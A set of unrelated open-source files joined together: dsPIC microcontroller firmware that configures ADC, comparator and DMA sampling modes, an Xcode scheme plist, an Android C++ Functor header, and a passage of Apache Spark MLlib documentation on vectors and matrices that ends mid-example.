        }
    }
}

/*
 * Configure ADC1 for CTMU use: 12-bit, manual (software-cleared SAMP)
 * conversions, no auto sampling. Leaves ADON off; the caller turns the
 * module on when needed.
 */
void initADCCTMU(void)
{
    _AD1IF = 0; _AD1IE = 0;                     // disable ADC interrupts
    disableADCDMA(); DisableComparator();
    AD1CON1bits.ADON = 0;                       // turn off ADC while reconfiguring
    AD1CON2 = 0;
    AD1CON4 = 0x0000;
    AD1CSSH = 0x0000;
    AD1CSSL = 0x0000;
    AD1CON1bits.AD12B = 1;                      // 12-bit mode
    /* Assign MUXA inputs for block read */
    AD1CHS0bits.CH0SA = CHOSA;
    AD1CON3bits.ADRC = 0;                       // do not use internal RC clock
    AD1CON1bits.SSRCG = 0;
    AD1CON1bits.SSRC = 0b000;                   // clearing SAMP bit stops sampling and triggers conversion
    AD1CON1bits.SIMSAM = 0;                     // no simultaneous sampling (single channel)
    AD1CON1bits.ASAM = 0;                       // no auto sampling
    AD1CON3bits.SAMC = 0x10;                    // sample for (x+1)*Tad before triggering conversion
    AD1CON2bits.SMPI = 0;
    AD1CON3bits.ADCS = 0xA;                     // conversion clock x*Tp
}

/* Turn comparator 4 off and gate its peripheral clock (power saving). */
void DisableComparator()
{
    CM4CONbits.CON = 0;
    PMD3bits.CMPMD = 1;
}

/*
 * Set up comparator 4 against the internal CVref ladder (~1.54 V) with a
 * digital glitch filter, event on high-to-low, output on the CxOUT pin.
 */
void EnableComparator()
{
    /*----setup comparator---*/
    CVRCONbits.VREFSEL = 0;                     // voltage reference is generated by resistor network
    CVRCONbits.CVREN = 1;                       // enable comparator reference source
    CVRCONbits.CVRR = 0;                        // step size is CVRSRC/32
    CVRCONbits.CVR = 7;                         // CVREFIN = (1/4)*(3.3) + (7/32)*(3.3) = 1.54V
    CM4CONbits.CCH = 0;                         // VIN- input of comparator connects to C4IN1-
    CM4CONbits.CREF = 1;                        // VIN+ input connected to CVRefin voltage source
    CM4CONbits.EVPOL = 1;                       // trigger/event/interrupt generated on high to low
    CM4CONbits.CPOL = 0;                        // comparator output is not inverted
    CM4CONbits.CEVT = 0;
    CM4CONbits.COE = 1;                         // comparator output is present on CxOUT pin
    CM4FLTRbits.CFSEL = 0;                      // choose CPU instruction clock (TCY)
    CM4FLTRbits.CFDIV = 4;                      // choose comparator filter clock
    CM4FLTRbits.CFLTREN = 1;                    // digital filter enabled
    CM4MSKSRCbits.SELSRCA = 1;                  // PWM1H1 is the source for Mask A input
    CM4MSKCONbits.HLMS = 1;                     // mask input will prevent comparator output
    CM4MSKCONbits.OAEN = 1;                     // OR gate A input enabled
    CM4CONbits.CON = 1;                         // comparator is enabled
    PMD3bits.CMPMD = 0;                         // enable comparator peripheral clock
}

/*
 * 10-bit, 4-channel simultaneous-sampling capture mode, paced by Timer5
 * compare (SSRC=4). Timer5 is restarted here; the period (PR5) is set
 * separately in setupADC10().
 */
void initADC10(void)
{
    /* Set port configuration */
    AD1CON1 = 0;
    disableADCDMA();
    /* Initialize ADC module */
    AD1CON1bits.AD12B = 0;                      // 10-bit mode
    AD1CON1bits.SSRCG = 0;
    AD1CON1bits.SSRC = 4;                       // Timer5 compare starts conversion
    AD1CON1bits.ASAM = 1;                       // auto sampling
    AD1CON1bits.SIMSAM = 1;                     // simultaneous sampling
    AD1CHS0bits.CH0SA = CHOSA;                  // AN3 - CH0
    AD1CHS0bits.CH0NA = 0;
    AD1CHS123bits.CH123SA = CH123SA;            // AN0 -> CH1 , AN1 -> CH2, AN2 -> CH3
    AD1CHS123bits.CH123NA = 0;                  // -ve of CH1,2,3 to -vref
    AD1CON2bits.SMPI = 0;                       // generate interrupt after converting all chans
    AD1CON4 = 0x0000;
    AD1CSSH = 0x0000;
    AD1CSSL = 0x0000;
    /* Assign MUXA inputs for block read */
    _AD1IF = 0;
    _AD1IE = 0;                                 // disable ADC interrupt until required
    //AD1CON3bits.SAMC = 0;                     // SAMC - Sample for (x+1)*Tad before triggering conversion (TMR5 will decide this here)
    AD1CON3bits.ADCS = 1;                       // conversion clock x*Tp
    AD1CON3bits.ADRC = 0;                       // use clock derived from system clock
    AD1CON1bits.ADON = 1;
    Delay_us(20);                               // settle after enabling the module
    T5CONbits.TON = 0;
    T5CONbits.TSIDL = 1;
    T5CONbits.TCKPS = 1;
    TMR5 = 0x0000;
    T5CONbits.TON = 1;
    _T5IF = 0; _T5IE = 0;
}

/*
 * DMA-driven capture mode. 'bits' selects resolution: 0 = 10-bit,
 * 1 = 12-bit. Timer5 paces conversions; DMA channel 0 moves results to RAM
 * in one-shot mode. NOTE(review): unlike initADC10(), Timer5 is left
 * stopped here -- presumably started later by the capture routine; confirm
 * against the caller.
 */
void initADCDMA(BYTE bits)
{
    /* Set port configuration */
    AD1CON1 = 0;
    /* Initialize ADC module */
    AD1CON1bits.AD12B = bits;                   // 0 = 10-bit, 1 = 12-bit
    AD1CON1bits.SSRCG = 0;
    AD1CON1bits.SSRC = 4;                       // Timer5 compare starts conversion
    AD1CON1bits.ASAM = 1;                       // auto sampling
    AD1CON1bits.SIMSAM = 1;                     // simultaneous sampling
    AD1CHS0bits.CH0SA = CHOSA;
    AD1CHS0bits.CH0NA = 0;
    AD1CHS123bits.CH123SA = CH123SA;            // AN0 -> CH1 , AN1 -> CH2, AN2 -> CH3
    AD1CHS123bits.CH123NA = 0;                  // -ve of CH1,2,3 to -vref
    AD1CON2bits.SMPI = 0;                       // generate interrupt after converting all chans
    AD1CON4 = 0x0000;
    AD1CSSH = 0x0000;
    AD1CSSL = 0x0000;
    /* Assign MUXA inputs for block read */
    _AD1IF = 0; _AD1IE = 0;                     // disable ADC interrupt until required
    AD1CON3bits.ADCS = 1;                       // conversion clock x*Tp
    AD1CON3bits.ADRC = 0;                       // use clock derived from system clock
    AD1CON1bits.ADON = 1;
    Delay_us(20);
    T5CONbits.TON = 0;
    T5CONbits.TSIDL = 1;
    T5CONbits.TCKPS = 1;
    TMR5 = 0x0000;
    _T5IF = 0; _T5IE = 0;
    DMA0CONbits.CHEN = 0;
    DMA0CONbits.AMODE = 0b00;                   // register indirect with post increment
    DMA0CONbits.MODE = 0b01;                    // one shot, ping-pong mode disabled
    DMA0CONbits.DIR = 0;                        // peripheral to RAM
    DMA0REQ = 0b1101;                           // select ADC module as DMA request source
    DMA_MODE = DMA_LA_ONE_CHAN;
    enableADCDMA();
}

/*
 * 12-bit single-channel oscilloscope mode, paced by Timer5 compare.
 * Same pacing scheme as initADC10() but CH0 only and a slower conversion
 * clock (ADCS=9) as required for 12-bit conversions.
 */
void initADC12bit_scope(void)
{
    /* Set port configuration */
    disableADCDMA();
    AD1CON1bits.ADON = 0;
    /* Initialize ADC module */
    AD1CON1bits.AD12B = 1;
    AD1CON1bits.SSRCG = 0;
    AD1CON1bits.SSRC = 4;                       // Timer5 compare starts conversion
    AD1CON1bits.ASAM = 1;                       // auto sampling
    AD1CHS0bits.CH0SA = CHOSA;                  // AN3 - CH0
    AD1CHS0bits.CH0NA = 0;
    AD1CON2bits.SMPI = 0;                       // generate interrupt after converting all chans
    AD1CON4 = 0x0000;
    AD1CSSH = 0x0000;
    AD1CSSL = 0x0000;
    /* Assign MUXA inputs for block read */
    _AD1IF = 0; _AD1IE = 0;                     // disable ADC interrupt until required
    AD1CON3bits.ADCS = 9;                       // conversion clock x*Tp
    AD1CON3bits.ADRC = 0;                       // use clock derived from system clock
    AD1CON1bits.ADON = 1;
    Delay_us(20);
    T5CONbits.TON = 0;
    T5CONbits.TSIDL = 1;
    T5CONbits.TCKPS = 1;
    TMR5 = 0x0000;
    T5CONbits.TON = 1;
    _T5IF = 0; _T5IE = 0;
}

/*
 * 12-bit one-shot mode for single voltage reads (see get_voltage()).
 * Uses the internal RC clock and the internal counter (SSRC=7) so a
 * conversion self-completes after the SAMC sampling window.
 */
void initADC12(void)
{
    _AD1IF = 0; _AD1IE = 0;
    disableADCDMA();
    AD1CON2 = 0;
    AD1CON4 = 0x0000;
    AD1CSSH = 0x0000;
    AD1CSSL = 0x0000;
    AD1CON1bits.ADON = 0;
    AD1CON1bits.AD12B = 1;
    AD1CON1bits.ADSIDL = 0;
    AD1CON3bits.ADRC = 1;                       // use internal clock
    AD1CON1bits.SSRCG = 0;
    AD1CON2bits.CHPS = 0;
    AD1CHS0bits.CH0SA = CHOSA;                  // AN3 - CH0
    AD1CHS0bits.CH0NA = 0;
    AD1CON1bits.SSRC = 7;                       // internal counter ends sampling, starts conversion
    //AD1CON1bits.SIMSAM = 0;                   // simultaneous sampling: not applicable for single channel sampling
    AD1CON1bits.ASAM = 0;                       // no auto sampling
    AD1CON2bits.SMPI = 0;                       // generate interrupt after argument+1 conversions
    /* Assign MUXA inputs for block read */
    //AD1CHS0bits.CH0SA = channel;              // AN<channel> connected to CH0
    AD1CON3bits.SAMC = 0x1f;                    // sample for (x+1)*Tad before triggering conversion
    AD1CON3bits.ADCS = 9;                       // conversion clock x*Tp
    //AD1CON2bits.CHPS = 0;                     // unimplemented in 12 bit mode. read as 0
    AD1CON1bits.ADON = 1;
    Delay_us(20);
}

/*
 * 12-bit mode that fills all 16 result buffers before interrupting
 * (SMPI=15), so get_voltage_summed() can average 16 conversions.
 * Leaves ADON off; the caller enables the module.
 */
void initADC12_averaging16()
{
    _AD1IF = 0; _AD1IE = 0;                     // disable ADC interrupts
    disableADCDMA();
    AD1CON1bits.ADON = 0;                       // turn off ADC
    AD1CON2 = 0;
    AD1CON4 = 0x0000;
    AD1CSSH = 0x0000;
    AD1CSSL = 0x0000;
    AD1CON1bits.AD12B = 1;                      // 12 bit mode
    AD1CON1bits.ADSIDL = 0;                     // continue operation in idle
    AD1CON3bits.ADRC = 0;                       // do not use internal clock
    AD1CON1bits.SSRCG = 0;
    AD1CON2bits.CHPS = 0;
    /* Assign MUXA inputs for block read */
    AD1CHS0bits.CH0SA = CHOSA;
    AD1CHS0bits.CH0NA = 0;
    AD1CON1bits.SSRC = 7;                       // internal counter ends sampling, starts conversion (SSRCG=0)
    AD1CON3bits.SAMC = 0x10;                    // sample for (x+1)*Tad before triggering conversion
    AD1CON3bits.ADCS = 0xA;                     // conversion clock Tad = ADCS*Tp (15 ns)
    AD1CON2bits.SMPI = 15;                      // generate interrupt after argument+1 conversions
}

/*
 * Switch the ADC into 'mode' with inputs 'chosa'/'ch123sa'.
 * No-op when nothing changed; otherwise tears down the comparator if it
 * owned the shared pin (CHOSA 5 or 7) and runs the matching init routine.
 */
void setADCMode(BYTE mode, BYTE chosa, BYTE ch123sa)
{
    if (ADC_MODE == mode && chosa == CHOSA && ch123sa == CH123SA)return;
    else
    {
        if (CHOSA == 7 || CHOSA == 5)DisableComparator();
        ADC_MODE = mode;
        CHOSA = chosa;
        CH123SA = ch123sa;
        if (mode == ADC_10BIT_SIMULTANEOUS)initADC10();
        else if (mode == ADC_10BIT_DMA)initADCDMA(0);   // 10 bit mode
        else if (mode == ADC_12BIT_DMA)initADCDMA(1);   // 12 bit mode
        else if (mode == ADC_12BIT)initADC12();
        else if (mode == ADC_12BIT_SCOPE)initADC12bit_scope();
        else if (mode == ADC_12BIT_AVERAGING)initADC12_averaging16();
        else if (mode == ADC_CTMU)initADCCTMU();
    }
}

/*
 * Blocking read: sum of 16 consecutive 12-bit conversions of 'channel'
 * (caller divides by 16 for the average). Busy-waits on _AD1IF/DONE,
 * then reads all sixteen result buffers (SMPI=15 above fills them all).
 */
uint16 get_voltage_summed(BYTE channel)
{
    setADCMode(ADC_12BIT_AVERAGING, channel, 0);
    AD1CON1bits.ADON = 1;                       // turn on the ADC
    Delay_us(20);
    AD1CON1bits.ASAM = 1;                       // auto sampling
    _AD1IF = 0;
    while (!_AD1IF);
    _AD1IF = 0;
    while (!AD1CON1bits.DONE);                  // wait for conversion
    AD1CON1bits.ASAM = 0;                       // stop auto sampling
    AD1CON1bits.ADON = 0;
    return (ADC1BUF0)+(ADC1BUF1)+(ADC1BUF2)+(ADC1BUF3)+(ADC1BUF4)+(ADC1BUF5)+(ADC1BUF6)+(ADC1BUF7)
           +(ADC1BUF8)+(ADC1BUF9)+(ADC1BUFA)+(ADC1BUFB)+(ADC1BUFC)+(ADC1BUFD)+(ADC1BUFE)+(ADC1BUFF);
}

/*
 * Blocking single conversion of AN<channel> using whatever mode is
 * currently configured. Busy-waits on DONE with no timeout.
 */
uint16 get_voltage(BYTE channel)
{
    AD1CHS0bits.CH0SA = channel;                // AN<channel> connected to CH0
    AD1CON1bits.SAMP = 1;                       // start sampling
    while (!AD1CON1bits.DONE);
    return ADC1BUF0;
}

/* Program the Timer5 sample-rate period (ADC_DELAY ticks) and start it. */
void setupADC10()
{
    T5CONbits.TCKPS = 1;
    PR5 = ADC_DELAY - 1;
    TMR5 = 0x0000;
    T5CONbits.TON = 1;
}

/* One-time pin setup: mark the ADC input pins as analog, rest digital. */
void configureADC()
{
    ANSELB = ANSELC = 0x0000;
    ANSELAbits.ANSA0 = 1;                       // ensure AN0 is analog
    ANSELAbits.ANSA1 = 1;                       // ensure AN1 is analog
    ANSELBbits.ANSB0 = 1;
    ANSELBbits.ANSB1 = 1;
    ANSELBbits.ANSB3 = 1;
    ANSELCbits.ANSC1 = 1;
    ANSELCbits.ANSC2 = 1;                       // URGENT!
}

/* Route ADC results to DMA (write ADC1BUF0 only, DMA enabled). */
void enableADCDMA()
{
    AD1CON1bits.ADDMABM = 1;
    AD1CON4bits.ADDMAEN = 1;
}

/* Detach the ADC from DMA and disable DMA channel 0. */
void disableADCDMA()
{
    AD1CON1bits.ADDMABM = 0;
    AD1CON4bits.ADDMAEN = 0;
    DMA0CONbits.CHEN = 0;
}
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>SchemeUserState</key> <dict> <key>MZSelectableLabelDemo.xcscheme</key> <dict> <key>orderHint</key> <integer>0</integer> </dict> </dict> <key>SuppressBuildableAutocreation</key> <dict> <key>1FAA362C198FD105005FAD10</key> <dict> <key>primary</key> <true/> </dict> <key>1FAA3642198FD106005FAD10</key> <dict> <key>primary</key> <true/> </dict> </dict> </dict> </plist>
{ "pile_set_name": "Github" }
/* * Copyright (C) 2011 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #ifndef ANDROID_FUNCTOR_H #define ANDROID_FUNCTOR_H #include <utils/Errors.h> namespace android { class Functor { public: Functor() {} virtual ~Functor() {} virtual status_t operator ()(int what, void* data) { return NO_ERROR; } }; }; // namespace android #endif // ANDROID_FUNCTOR_H
{ "pile_set_name": "Github" }
--- layout: global title: Data Types - RDD-based API displayTitle: Data Types - RDD-based API --- * Table of contents {:toc} MLlib supports local vectors and matrices stored on a single machine, as well as distributed matrices backed by one or more RDDs. Local vectors and local matrices are simple data models that serve as public interfaces. The underlying linear algebra operations are provided by [Breeze](http://www.scalanlp.org/). A training example used in supervised learning is called a "labeled point" in MLlib. ## Local vector A local vector has integer-typed and 0-based indices and double-typed values, stored on a single machine. MLlib supports two types of local vectors: dense and sparse. A dense vector is backed by a double array representing its entry values, while a sparse vector is backed by two parallel arrays: indices and values. For example, a vector `(1.0, 0.0, 3.0)` can be represented in dense format as `[1.0, 0.0, 3.0]` or in sparse format as `(3, [0, 2], [1.0, 3.0])`, where `3` is the size of the vector. <div class="codetabs"> <div data-lang="scala" markdown="1"> The base class of local vectors is [`Vector`](api/scala/index.html#org.apache.spark.mllib.linalg.Vector), and we provide two implementations: [`DenseVector`](api/scala/index.html#org.apache.spark.mllib.linalg.DenseVector) and [`SparseVector`](api/scala/index.html#org.apache.spark.mllib.linalg.SparseVector). We recommend using the factory methods implemented in [`Vectors`](api/scala/index.html#org.apache.spark.mllib.linalg.Vectors$) to create local vectors. Refer to the [`Vector` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.Vector) and [`Vectors` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.Vectors$) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.{Vector, Vectors} // Create a dense vector (1.0, 0.0, 3.0). 
val dv: Vector = Vectors.dense(1.0, 0.0, 3.0) // Create a sparse vector (1.0, 0.0, 3.0) by specifying its indices and values corresponding to nonzero entries. val sv1: Vector = Vectors.sparse(3, Array(0, 2), Array(1.0, 3.0)) // Create a sparse vector (1.0, 0.0, 3.0) by specifying its nonzero entries. val sv2: Vector = Vectors.sparse(3, Seq((0, 1.0), (2, 3.0))) {% endhighlight %} ***Note:*** Scala imports `scala.collection.immutable.Vector` by default, so you have to import `org.apache.spark.mllib.linalg.Vector` explicitly to use MLlib's `Vector`. </div> <div data-lang="java" markdown="1"> The base class of local vectors is [`Vector`](api/java/org/apache/spark/mllib/linalg/Vector.html), and we provide two implementations: [`DenseVector`](api/java/org/apache/spark/mllib/linalg/DenseVector.html) and [`SparseVector`](api/java/org/apache/spark/mllib/linalg/SparseVector.html). We recommend using the factory methods implemented in [`Vectors`](api/java/org/apache/spark/mllib/linalg/Vectors.html) to create local vectors. Refer to the [`Vector` Java docs](api/java/org/apache/spark/mllib/linalg/Vector.html) and [`Vectors` Java docs](api/java/org/apache/spark/mllib/linalg/Vectors.html) for details on the API. {% highlight java %} import org.apache.spark.mllib.linalg.Vector; import org.apache.spark.mllib.linalg.Vectors; // Create a dense vector (1.0, 0.0, 3.0). Vector dv = Vectors.dense(1.0, 0.0, 3.0); // Create a sparse vector (1.0, 0.0, 3.0) by specifying its indices and values corresponding to nonzero entries. Vector sv = Vectors.sparse(3, new int[] {0, 2}, new double[] {1.0, 3.0}); {% endhighlight %} </div> <div data-lang="python" markdown="1"> MLlib recognizes the following types as dense vectors: * NumPy's [`array`](http://docs.scipy.org/doc/numpy/reference/generated/numpy.array.html) * Python's list, e.g., `[1, 2, 3]` and the following as sparse vectors: * MLlib's [`SparseVector`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.SparseVector). 
* SciPy's [`csc_matrix`](http://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.csc_matrix.html#scipy.sparse.csc_matrix) with a single column We recommend using NumPy arrays over lists for efficiency, and using the factory methods implemented in [`Vectors`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Vectors) to create sparse vectors. Refer to the [`Vectors` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Vectors) for more details on the API. {% highlight python %} import numpy as np import scipy.sparse as sps from pyspark.mllib.linalg import Vectors # Use a NumPy array as a dense vector. dv1 = np.array([1.0, 0.0, 3.0]) # Use a Python list as a dense vector. dv2 = [1.0, 0.0, 3.0] # Create a SparseVector. sv1 = Vectors.sparse(3, [0, 2], [1.0, 3.0]) # Use a single-column SciPy csc_matrix as a sparse vector. sv2 = sps.csc_matrix((np.array([1.0, 3.0]), np.array([0, 2]), np.array([0, 2])), shape=(3, 1)) {% endhighlight %} </div> </div> ## Labeled point A labeled point is a local vector, either dense or sparse, associated with a label/response. In MLlib, labeled points are used in supervised learning algorithms. We use a double to store a label, so we can use labeled points in both regression and classification. For binary classification, a label should be either `0` (negative) or `1` (positive). For multiclass classification, labels should be class indices starting from zero: `0, 1, 2, ...`. <div class="codetabs"> <div data-lang="scala" markdown="1"> A labeled point is represented by the case class [`LabeledPoint`](api/scala/index.html#org.apache.spark.mllib.regression.LabeledPoint). Refer to the [`LabeledPoint` Scala docs](api/scala/index.html#org.apache.spark.mllib.regression.LabeledPoint) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.Vectors import org.apache.spark.mllib.regression.LabeledPoint // Create a labeled point with a positive label and a dense feature vector. 
val pos = LabeledPoint(1.0, Vectors.dense(1.0, 0.0, 3.0)) // Create a labeled point with a negative label and a sparse feature vector. val neg = LabeledPoint(0.0, Vectors.sparse(3, Array(0, 2), Array(1.0, 3.0))) {% endhighlight %} </div> <div data-lang="java" markdown="1"> A labeled point is represented by [`LabeledPoint`](api/java/org/apache/spark/mllib/regression/LabeledPoint.html). Refer to the [`LabeledPoint` Java docs](api/java/org/apache/spark/mllib/regression/LabeledPoint.html) for details on the API. {% highlight java %} import org.apache.spark.mllib.linalg.Vectors; import org.apache.spark.mllib.regression.LabeledPoint; // Create a labeled point with a positive label and a dense feature vector. LabeledPoint pos = new LabeledPoint(1.0, Vectors.dense(1.0, 0.0, 3.0)); // Create a labeled point with a negative label and a sparse feature vector. LabeledPoint neg = new LabeledPoint(0.0, Vectors.sparse(3, new int[] {0, 2}, new double[] {1.0, 3.0})); {% endhighlight %} </div> <div data-lang="python" markdown="1"> A labeled point is represented by [`LabeledPoint`](api/python/pyspark.mllib.html#pyspark.mllib.regression.LabeledPoint). Refer to the [`LabeledPoint` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.regression.LabeledPoint) for more details on the API. {% highlight python %} from pyspark.mllib.linalg import SparseVector from pyspark.mllib.regression import LabeledPoint # Create a labeled point with a positive label and a dense feature vector. pos = LabeledPoint(1.0, [1.0, 0.0, 3.0]) # Create a labeled point with a negative label and a sparse feature vector. neg = LabeledPoint(0.0, SparseVector(3, [0, 2], [1.0, 3.0])) {% endhighlight %} </div> </div> ***Sparse data*** It is very common in practice to have sparse training data. MLlib supports reading training examples stored in `LIBSVM` format, which is the default format used by [`LIBSVM`](http://www.csie.ntu.edu.tw/~cjlin/libsvm/) and [`LIBLINEAR`](http://www.csie.ntu.edu.tw/~cjlin/liblinear/). 
It is a text format in which each line represents a labeled sparse feature vector using the following format: ~~~ label index1:value1 index2:value2 ... ~~~ where the indices are one-based and in ascending order. After loading, the feature indices are converted to zero-based. <div class="codetabs"> <div data-lang="scala" markdown="1"> [`MLUtils.loadLibSVMFile`](api/scala/index.html#org.apache.spark.mllib.util.MLUtils$) reads training examples stored in LIBSVM format. Refer to the [`MLUtils` Scala docs](api/scala/index.html#org.apache.spark.mllib.util.MLUtils$) for details on the API. {% highlight scala %} import org.apache.spark.mllib.regression.LabeledPoint import org.apache.spark.mllib.util.MLUtils import org.apache.spark.rdd.RDD val examples: RDD[LabeledPoint] = MLUtils.loadLibSVMFile(sc, "data/mllib/sample_libsvm_data.txt") {% endhighlight %} </div> <div data-lang="java" markdown="1"> [`MLUtils.loadLibSVMFile`](api/java/org/apache/spark/mllib/util/MLUtils.html) reads training examples stored in LIBSVM format. Refer to the [`MLUtils` Java docs](api/java/org/apache/spark/mllib/util/MLUtils.html) for details on the API. {% highlight java %} import org.apache.spark.mllib.regression.LabeledPoint; import org.apache.spark.mllib.util.MLUtils; import org.apache.spark.api.java.JavaRDD; JavaRDD<LabeledPoint> examples = MLUtils.loadLibSVMFile(jsc.sc(), "data/mllib/sample_libsvm_data.txt").toJavaRDD(); {% endhighlight %} </div> <div data-lang="python" markdown="1"> [`MLUtils.loadLibSVMFile`](api/python/pyspark.mllib.html#pyspark.mllib.util.MLUtils) reads training examples stored in LIBSVM format. Refer to the [`MLUtils` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.util.MLUtils) for more details on the API. 
{% highlight python %} from pyspark.mllib.util import MLUtils examples = MLUtils.loadLibSVMFile(sc, "data/mllib/sample_libsvm_data.txt") {% endhighlight %} </div> </div> ## Local matrix A local matrix has integer-typed row and column indices and double-typed values, stored on a single machine. MLlib supports dense matrices, whose entry values are stored in a single double array in column-major order, and sparse matrices, whose non-zero entry values are stored in the Compressed Sparse Column (CSC) format in column-major order. For example, the following dense matrix `\[ \begin{pmatrix} 1.0 & 2.0 \\ 3.0 & 4.0 \\ 5.0 & 6.0 \end{pmatrix} \]` is stored in a one-dimensional array `[1.0, 3.0, 5.0, 2.0, 4.0, 6.0]` with the matrix size `(3, 2)`. <div class="codetabs"> <div data-lang="scala" markdown="1"> The base class of local matrices is [`Matrix`](api/scala/index.html#org.apache.spark.mllib.linalg.Matrix), and we provide two implementations: [`DenseMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.DenseMatrix), and [`SparseMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.SparseMatrix). We recommend using the factory methods implemented in [`Matrices`](api/scala/index.html#org.apache.spark.mllib.linalg.Matrices$) to create local matrices. Remember, local matrices in MLlib are stored in column-major order. Refer to the [`Matrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.Matrix) and [`Matrices` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.Matrices$) for details on the API. 
{% highlight scala %} import org.apache.spark.mllib.linalg.{Matrix, Matrices} // Create a dense matrix ((1.0, 2.0), (3.0, 4.0), (5.0, 6.0)) val dm: Matrix = Matrices.dense(3, 2, Array(1.0, 3.0, 5.0, 2.0, 4.0, 6.0)) // Create a sparse matrix ((9.0, 0.0), (0.0, 8.0), (0.0, 6.0)) val sm: Matrix = Matrices.sparse(3, 2, Array(0, 1, 3), Array(0, 2, 1), Array(9, 6, 8)) {% endhighlight %} </div> <div data-lang="java" markdown="1"> The base class of local matrices is [`Matrix`](api/java/org/apache/spark/mllib/linalg/Matrix.html), and we provide two implementations: [`DenseMatrix`](api/java/org/apache/spark/mllib/linalg/DenseMatrix.html), and [`SparseMatrix`](api/java/org/apache/spark/mllib/linalg/SparseMatrix.html). We recommend using the factory methods implemented in [`Matrices`](api/java/org/apache/spark/mllib/linalg/Matrices.html) to create local matrices. Remember, local matrices in MLlib are stored in column-major order. Refer to the [`Matrix` Java docs](api/java/org/apache/spark/mllib/linalg/Matrix.html) and [`Matrices` Java docs](api/java/org/apache/spark/mllib/linalg/Matrices.html) for details on the API. {% highlight java %} import org.apache.spark.mllib.linalg.Matrix; import org.apache.spark.mllib.linalg.Matrices; // Create a dense matrix ((1.0, 2.0), (3.0, 4.0), (5.0, 6.0)) Matrix dm = Matrices.dense(3, 2, new double[] {1.0, 3.0, 5.0, 2.0, 4.0, 6.0}); // Create a sparse matrix ((9.0, 0.0), (0.0, 8.0), (0.0, 6.0)) Matrix sm = Matrices.sparse(3, 2, new int[] {0, 1, 3}, new int[] {0, 2, 1}, new double[] {9, 6, 8}); {% endhighlight %} </div> <div data-lang="python" markdown="1"> The base class of local matrices is [`Matrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Matrix), and we provide two implementations: [`DenseMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.DenseMatrix), and [`SparseMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.SparseMatrix). 
We recommend using the factory methods implemented
in [`Matrices`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Matrices) to create local
matrices. Remember, local matrices in MLlib are stored in column-major order.

Refer to the [`Matrix` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Matrix)
and [`Matrices` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Matrices)
for more details on the API.

{% highlight python %}
from pyspark.mllib.linalg import Matrix, Matrices

# Create a dense matrix ((1.0, 2.0), (3.0, 4.0), (5.0, 6.0))
dm2 = Matrices.dense(3, 2, [1, 3, 5, 2, 4, 6])

# Create a sparse matrix ((9.0, 0.0), (0.0, 8.0), (0.0, 6.0))
sm = Matrices.sparse(3, 2, [0, 1, 3], [0, 2, 1], [9, 6, 8])
{% endhighlight %}
</div>

</div>

## Distributed matrix

A distributed matrix has long-typed row and column indices and double-typed values, stored
distributively in one or more RDDs.  It is very important to choose the right format to store large
and distributed matrices.  Converting a distributed matrix to a different format may require a
global shuffle, which is quite expensive.  Four types of distributed matrices have been implemented
so far.

The basic type is called `RowMatrix`. A `RowMatrix` is a row-oriented distributed
matrix without meaningful row indices, e.g., a collection of feature vectors.
It is backed by an RDD of its rows, where each row is a local vector.
We assume that the number of columns is not huge for a `RowMatrix` so that a single
local vector can be reasonably communicated to the driver and can also be stored /
operated on using a single node.
An `IndexedRowMatrix` is similar to a `RowMatrix` but with row indices,
which can be used for identifying rows and executing joins.
A `CoordinateMatrix` is a distributed matrix stored in [coordinate list (COO)](https://en.wikipedia.org/wiki/Sparse_matrix#Coordinate_list_.28COO.29) format,
backed by an RDD of its entries.
A `BlockMatrix` is a distributed matrix backed by an RDD of `MatrixBlock` which is a tuple of `(Int, Int, Matrix)`. ***Note*** The underlying RDDs of a distributed matrix must be deterministic, because we cache the matrix size. In general the use of non-deterministic RDDs can lead to errors. ### RowMatrix A `RowMatrix` is a row-oriented distributed matrix without meaningful row indices, backed by an RDD of its rows, where each row is a local vector. Since each row is represented by a local vector, the number of columns is limited by the integer range but it should be much smaller in practice. <div class="codetabs"> <div data-lang="scala" markdown="1"> A [`RowMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.RowMatrix) can be created from an `RDD[Vector]` instance. Then we can compute its column summary statistics and decompositions. [QR decomposition](https://en.wikipedia.org/wiki/QR_decomposition) is of the form A = QR where Q is an orthogonal matrix and R is an upper triangular matrix. For [singular value decomposition (SVD)](https://en.wikipedia.org/wiki/Singular_value_decomposition) and [principal component analysis (PCA)](https://en.wikipedia.org/wiki/Principal_component_analysis), please refer to [Dimensionality reduction](mllib-dimensionality-reduction.html). Refer to the [`RowMatrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.RowMatrix) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.Vector import org.apache.spark.mllib.linalg.distributed.RowMatrix val rows: RDD[Vector] = ... // an RDD of local vectors // Create a RowMatrix from an RDD[Vector]. val mat: RowMatrix = new RowMatrix(rows) // Get its size. 
